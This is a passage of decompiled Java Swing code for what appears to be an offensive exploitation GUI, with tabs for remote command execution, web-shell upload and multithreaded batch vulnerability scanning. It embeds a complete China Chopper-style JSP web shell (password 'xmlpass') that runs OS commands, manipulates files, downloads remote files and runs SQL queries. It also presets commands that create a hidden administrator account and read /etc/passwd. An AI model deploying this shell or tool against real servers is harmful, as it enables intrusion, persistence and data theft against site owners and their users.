        groupLayout.setVerticalGroup(groupLayout.createParallelGroup().addGroup(GroupLayout.Alignment.TRAILING, groupLayout.createSequentialGroup().addContainerGap(16, 32767).addComponent(this.scrollPane1, -2, 341, -2).addContainerGap()));
        this.tabbedPane1.addTab("基本信息", this.panel1);
        this.label3.setText("命令：");
        this.jcombox_cmd.setEditable(true);
        this.jcombox_cmd.setModel(new DefaultComboBoxModel(new String[]{"whoami", "ipconfig", "ifconfig", "net user txf txf /add", "net localgroup administrators txf /add", "cat /etc/passwd"}));
        this.jbtn_execmd.setText("执行");
        this.jbtn_execmd.addActionListener(actionEvent5 -> {
            jbtn_execmdActionPerformed(actionEvent5);
        });
        this.scrollPane3.setViewportView(this.jtxt_cmd_result);
        this.jcombox_encoding.setModel(new DefaultComboBoxModel(new String[]{"GBK", "UTF-8", "GB2313", "ISO-8859-1"}));
        GroupLayout groupLayout2 = new GroupLayout(this.panel2);
        this.panel2.setLayout(groupLayout2);
        groupLayout2.setHorizontalGroup(groupLayout2.createParallelGroup().addGroup(GroupLayout.Alignment.TRAILING, groupLayout2.createSequentialGroup().addGroup(groupLayout2.createParallelGroup(GroupLayout.Alignment.TRAILING).addGroup(groupLayout2.createSequentialGroup().addContainerGap().addComponent(this.scrollPane3, -1, 1189, 32767)).addGroup(GroupLayout.Alignment.LEADING, groupLayout2.createSequentialGroup().addGap(21, 21, 21).addComponent(this.label3, -2, 69, -2).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jcombox_cmd, -2, 889, -2).addGap(29, 29, 29).addComponent(this.jcombox_encoding, -2, 77, -2).addGap(18, 18, 18).addComponent(this.jbtn_execmd, -1, 86, 32767))).addGap(25, 25, 25)));
        groupLayout2.setVerticalGroup(groupLayout2.createParallelGroup().addGroup(groupLayout2.createSequentialGroup().addContainerGap().addGroup(groupLayout2.createParallelGroup(GroupLayout.Alignment.BASELINE).addComponent(this.label3).addComponent(this.jcombox_cmd, -2, -1, -2).addComponent(this.jcombox_encoding, -2, -1, -2).addComponent(this.jbtn_execmd)).addGap(18, 18, 18).addComponent(this.scrollPane3, -2, 275, -2).addContainerGap(34, 32767)));
        this.tabbedPane1.addTab("命令执行", this.panel2);
        this.label4.setText("文件路径：");
        this.jbtn_uploadFile.setText("上传文件");
        this.jbtn_uploadFile.addActionListener(actionEvent6 -> {
            jbtn_uploadFileActionPerformed(actionEvent6);
        });
        this.jtxt_fileContent.setText("<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!String Pwd=\"xmlpass\";String cs=\"UTF-8\";String EC(String s)throws Exception{return new String(s.getBytes(\"ISO-8859-1\"),cs);}Connection GC(String s)throws Exception{String[] x=s.trim().split(\"\\r\\n\");Class.forName(x[0].trim());if(x[1].indexOf(\"jdbc:oracle\")!=-1){return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase(\"[/null]\")?\"\":x[2],x[3].equalsIgnoreCase(\"[/null]\")?\"\":x[3]);}else{Connection c=DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase(\"[/null]\")?\"\":x[2],x[3].equalsIgnoreCase(\"[/null]\")?\"\":x[3]);if(x.length>4){c.setCatalog(x[4]);}return c;}}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT,sQ,sF=\"\";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat(\"yyyy-MM-dd HH:mm:ss\");for(int i=0; i<l.length; i++){dt=new java.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?\"R\":\"\";sQ +=l[i].canWrite()?\" W\":\"\";if(l[i].isDirectory()){sb.append(l[i].getName()+\"/\\t\"+sT+\"\\t\"+l[i].length()+\"\\t\"+sQ+\"\\n\");}else{sF+=l[i].getName()+\"\\t\"+sT+\"\\t\"+l[i].length()+\"\\t\"+sQ+\"\\n\";}}sb.append(sF);}void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();for(int k=0; k < x.length; k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));os.write((\"->\"+\"|\").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write((\"|\"+\"<-\").getBytes(),0,3);os.close();is.close();}void GG(String s,String d)throws 
Exception{String h=\"0123456789ABCDEF\";File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0; i<d.length();i+=2){os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i+1))));}os.close();}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();for(int j=0; j<z.length; j++){HH(s+\"/\"+z[j].getName(),d+\"/\"+z[j].getName());}}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat(\"yyyy-MM-dd HH:mm:ss\");java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s,String d)throws Exception{URL u=new URL(s);int n=0;FileOutputStream os=new FileOutputStream(d);HttpURLConnection h=(HttpURLConnection) u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];while((n=is.read(b))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}void MM(InputStream is,StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));while((l=br.readLine())!=null){sb.append(l+\"\\r\\n\");}}void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();while(r.next()){sb.append(r.getString(1)+\"\\t\");}r.close();c.close();}void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] x=s.trim().split(\"\\r\\n\");ResultSet r=c.getMetaData().getTables(null,s.indexOf(\"jdbc:oracle\")!=-1?x.length>5?x[5]:x[4]:null,\"%\",new 
String[]{\"TABLE\"});while(r.next()){sb.append(r.getString(\"TABLE_NAME\")+\"\\t\");}r.close();c.close();}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split(\"\\r\\n\");Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery(\"select * from \"+x[x.length-1]);ResultSetMetaData d=r.getMetaData();for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+\" (\"+d.getColumnTypeName(i)+\")\\t\");}r.close();m.close();c.close();}void QQ(String cs,String s,String q,StringBuffer sb,String p)throws Exception{Connection c=GC(s);Statement m=c.createStatement(1005,1008);BufferedWriter bw=null;try{ResultSet r=m.executeQuery(q.indexOf(\"--f:\")!=-1?q.substring(0,q.indexOf(\"--f:\")):q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(int i=1; i <=n; i++){sb.append(d.getColumnName(i)+\"\\t|\\t\");}sb.append(\"\\r\\n\");if(q.indexOf(\"--f:\")!=-1){File file=new File(p);if(q.indexOf(\"-to:\")==-1){file.mkdir();}bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf(\"-to:\")!=-1?p.trim():p+q.substring(q.indexOf(\"--f:\")+4,q.length()).trim()),true),cs));}while(r.next()){for(int i=1; i<=n;i++){if(q.indexOf(\"--f:\")!=-1){bw.write(r.getObject(i)+\"\"+\"\\t\");bw.flush();}else{sb.append(r.getObject(i)+\"\"+\"\\t|\\t\");}}if(bw!=null){bw.newLine();}sb.append(\"\\r\\n\");}r.close();if(bw!=null){bw.close();}}catch(Exception e){sb.append(\"Result\\t|\\t\\r\\n\");try{m.executeUpdate(q);sb.append(\"Execute Successfully!\\t|\\t\\r\\n\");}catch(Exception ee){sb.append(ee.toString()+\"\\t|\\t\\r\\n\");}}m.close();c.close();}%><%cs=request.getParameter(\"z0\")!=null?request.getParameter(\"z0\")+\"\":cs;response.setContentType(\"text/html\");response.setCharacterEncoding(cs);StringBuffer sb=new StringBuffer(\"\");try{String Z=EC(request.getParameter(Pwd)+\"\");String z1=EC(request.getParameter(\"z1\")+\"\");String z2=EC(request.getParameter(\"z2\")+\"\");sb.append(\"->\"+\"|\");String 
s=request.getSession().getServletContext().getRealPath(\"/\");if(Z.equals(\"A\")){sb.append(s+\"\\t\");if(!s.substring(0,1).equals(\"/\")){AA(sb);}}else if(Z.equals(\"B\")){BB(z1,sb);}else if(Z.equals(\"C\")){String l=\"\";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+\"\\r\\n\");}br.close();}else if(Z.equals(\"D\")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append(\"1\");}else if(Z.equals(\"E\")){EE(z1);sb.append(\"1\");}else if(Z.equals(\"F\")){FF(z1,response);}else if(Z.equals(\"G\")){GG(z1,z2);sb.append(\"1\");}else if(Z.equals(\"H\")){HH(z1,z2);sb.append(\"1\");}else if(Z.equals(\"I\")){II(z1,z2);sb.append(\"1\");}else if(Z.equals(\"J\")){JJ(z1);sb.append(\"1\");}else if(Z.equals(\"K\")){KK(z1,z2);sb.append(\"1\");}else if(Z.equals(\"L\")){LL(z1,z2);sb.append(\"1\");}else if(Z.equals(\"M\")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals(\"N\")){NN(z1,sb);}else if(Z.equals(\"O\")){OO(z1,sb);}else if(Z.equals(\"P\")){PP(z1,sb);}else if(Z.equals(\"Q\")){QQ(cs,z1,z2,sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z2.length()):s.replaceAll(\"\\\\\\\\\",\"/\")+\"images/\");}}catch(Exception e){sb.append(\"ERROR\"+\":// \"+e.toString());}sb.append(\"|\"+\"<-\");out.print(sb.toString());%>");
        this.scrollPane4.setViewportView(this.jtxt_fileContent);
        this.jcheckBox_use_user_path.setText("自定义路径");
        this.jcheckBox_use_user_path.setBackground(Color.white);
        GroupLayout groupLayout3 = new GroupLayout(this.panel3);
        this.panel3.setLayout(groupLayout3);
        groupLayout3.setHorizontalGroup(groupLayout3.createParallelGroup().addGroup(GroupLayout.Alignment.TRAILING, groupLayout3.createSequentialGroup().addGap(23, 23, 23).addGroup(groupLayout3.createParallelGroup(GroupLayout.Alignment.TRAILING).addComponent(this.scrollPane4, -1, 1179, 32767).addGroup(groupLayout3.createSequentialGroup().addComponent(this.label4, -2, 72, -2).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jtxt_filepath, -2, 735, -2).addGap(85, 85, 85).addComponent(this.jcheckBox_use_user_path, -2, 144, -2).addPreferredGap(LayoutStyle.ComponentPlacement.UNRELATED).addComponent(this.jbtn_uploadFile))).addGap(18, 18, 18)));
        groupLayout3.setVerticalGroup(groupLayout3.createParallelGroup().addGroup(groupLayout3.createSequentialGroup().addContainerGap().addGroup(groupLayout3.createParallelGroup(GroupLayout.Alignment.TRAILING).addComponent(this.label4, -2, 28, -2).addGroup(groupLayout3.createParallelGroup(GroupLayout.Alignment.BASELINE).addComponent(this.jbtn_uploadFile).addComponent(this.jtxt_filepath, -2, -1, -2).addComponent(this.jcheckBox_use_user_path))).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.scrollPane4, -2, 271, -2).addContainerGap(50, 32767)));
        this.tabbedPane1.addTab("文件上传", this.panel3);
        this.label5.setText("线程：");
        this.j_combox_threadSize.setModel(new DefaultComboBoxModel(new String[]{"1", "2", "3", "4", "5", "10", "20", "30", "40", "50", "60", "70", "80", "90"}));
        this.j_combox_threadSize.setEditable(true);
        this.j_combox_threadSize.setSelectedIndex(5);
        this.label6.setText("文件路径：");
        this.jbtn_batch_check_import.setText("导 入");
        this.jbtn_batch_check_import.addActionListener(actionEvent7 -> {
            jbtn_batch_check_importActionPerformed(actionEvent7);
        });
        this.jbtn_batch_check_start.setText("开 始");
        this.jbtn_batch_check_start.addActionListener(actionEvent8 -> {
            jbtn_batch_check_startActionPerformed(actionEvent8);
        });
        this.jbtn_batch_check_stop.setText("停 止");
        this.jbtn_batch_check_stop.addActionListener(actionEvent9 -> {
            jbtn_batch_check_stopActionPerformed(actionEvent9);
        });
        this.label7.setText("用 时：");
        this.label8.setText("进 度：");
        this.jlable_useTime.setText("0");
        this.jlabel_check_status.setText("0/0");
        this.scrollPane5.addMouseListener(new MouseAdapter() { // from class: view.Tools.5
            /**
             * Relays a mouse click on {@code scrollPane5} (the pane that hosts the
             * batch-check result table) to the enclosing {@code Tools} frame.
             *
             * @param mouseEvent the click event delivered by Swing
             */
            public void mouseClicked(MouseEvent mouseEvent) {
                // The adapter holds no logic of its own; the frame decides what a click means.
                final Tools owner = Tools.this;
                owner.scrollPane5MouseClicked(mouseEvent);
            }
        });
        this.jtable_batch_check_result.setAutoCreateRowSorter(true);
        this.jtable_batch_check_result.setModel(new DefaultTableModel(new Object[0], new String[]{"序号", "Web服务器", "Url地址", "是否存在漏洞"}) { // from class: view.Tools.6
            boolean[] columnEditable = {false, false, true, true};

            /**
             * Reports whether a cell of the batch-check result table may be edited.
             * The answer depends only on the column: it is looked up in the
             * {@code columnEditable} flags of this model, which mark the first two
             * columns read-only and the last two (URL and vulnerability result) editable.
             *
             * NOTE(review): because the result column is editable, the value shown for a
             * target can be changed by hand after a check has run. Whether the export
             * action reads from this model is not visible here; confirm, and consider a
             * read-only result column if the table serves as the record of findings.
             *
             * @param i  row index (not consulted)
             * @param i2 column index into {@code columnEditable}
             * @return the editable flag stored for column {@code i2}
             */
            public boolean isCellEditable(int i, int i2) {
                final boolean editable = this.columnEditable[i2];
                return editable;
            }
        });
        this.jtable_batch_check_result.addMouseListener(new MouseAdapter() { // from class: view.Tools.7
            /**
             * Relays a mouse click on the batch-check result table to the enclosing
             * {@code Tools} frame.
             *
             * @param mouseEvent the click event delivered by Swing
             */
            public void mouseClicked(MouseEvent mouseEvent) {
                // Forward only; the handling itself lives in Tools.
                final Tools owner = Tools.this;
                owner.jtable_batch_check_resultMouseClicked(mouseEvent);
            }
        });
        this.scrollPane5.setViewportView(this.jtable_batch_check_result);
        GroupLayout groupLayout4 = new GroupLayout(this.panel4);
        this.panel4.setLayout(groupLayout4);
        groupLayout4.setHorizontalGroup(groupLayout4.createParallelGroup().addGroup(groupLayout4.createSequentialGroup().addContainerGap().addGroup(groupLayout4.createParallelGroup().addGroup(groupLayout4.createSequentialGroup().addComponent(this.scrollPane5, -1, 1208, 32767).addContainerGap()).addGroup(groupLayout4.createSequentialGroup().addComponent(this.label5, -2, 53, -2).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.j_combox_threadSize, -2, 64, -2).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.label6).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jtxt_batch_chek_path, -2, 317, -2).addGap(18, 18, 18).addComponent(this.jbtn_batch_check_import).addGap(18, 18, 18).addComponent(this.jbtn_batch_check_start).addGap(18, 18, 18).addComponent(this.jbtn_batch_check_stop).addGap(18, 18, 18).addComponent(this.label7).addPreferredGap(LayoutStyle.ComponentPlacement.UNRELATED).addComponent(this.jlable_useTime, -2, UnitValue.DIV, -2).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.label8).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jlabel_check_status, -1, 137, 32767).addContainerGap(40, 32767)))));
        groupLayout4.setVerticalGroup(groupLayout4.createParallelGroup().addGroup(groupLayout4.createSequentialGroup().addContainerGap().addGroup(groupLayout4.createParallelGroup(GroupLayout.Alignment.BASELINE).addComponent(this.label5, -2, 29, -2).addComponent(this.label6).addComponent(this.jtxt_batch_chek_path, -2, -1, -2).addComponent(this.jbtn_batch_check_import).addComponent(this.jbtn_batch_check_start).addComponent(this.jbtn_batch_check_stop).addComponent(this.label7).addComponent(this.jlable_useTime).addComponent(this.label8).addComponent(this.jlabel_check_status).addComponent(this.j_combox_threadSize, -2, -1, -2)).addPreferredGap(LayoutStyle.ComponentPlacement.UNRELATED).addComponent(this.scrollPane5, -1, 309, 32767).addContainerGap()));
        this.tabbedPane1.addTab("批量检查", this.panel4);
        this.table.add(this.tabbedPane1, JLayeredPane.DEFAULT_LAYER);
        this.tabbedPane1.setBounds(10, 65, 1220, 395);
        this.jtxt_log.setLineWrap(true);
        this.jtxt_log.setRows(5);
        this.scrollPane2.setViewportView(this.jtxt_log);
        this.table.add(this.scrollPane2, JLayeredPane.DEFAULT_LAYER);
        this.scrollPane2.setBounds(10, 465, 1220, 135);
        this.jbtn_qun_start.setText("检测所有漏洞");
        this.jbtn_qun_start.addActionListener(actionEvent10 -> {
            jbtn_qun_startActionPerformed(actionEvent10);
        });
        this.table.add(this.jbtn_qun_start, JLayeredPane.DEFAULT_LAYER);
        this.jbtn_qun_start.setBounds(1020, 20, UnitValue.MIN, this.jbtn_qun_start.getPreferredSize().height);
        GroupLayout groupLayout5 = new GroupLayout(contentPane);
        contentPane.setLayout(groupLayout5);
        groupLayout5.setHorizontalGroup(groupLayout5.createParallelGroup().addComponent(this.table));
        groupLayout5.setVerticalGroup(groupLayout5.createParallelGroup().addComponent(this.table));
        setSize(1240, 650);
        setLocationRelativeTo(getOwner());
        this.jmenu_c_export.setText("导出结果");
        this.jmenu_c_export.addActionListener(actionEvent11 -> {
            jmenu_c_exportActionPerformed(actionEvent11);
        });
        this.jPopupMenu1.add(this.jmenu_c_export);
        this.jmenu_c_del_select_rows.setText("删除选中行");
        this.jmenu_c_del_select_rows.addActionListener(actionEvent12 -> {
            jmenu_c_del_select_rowsActionPerformed(actionEvent12);
        });
        this.jPopupMenu1.add(this.jmenu_c_del_select_rows);
        setExtendedState(6);
        setLocationRelativeTo(null);
    }
}
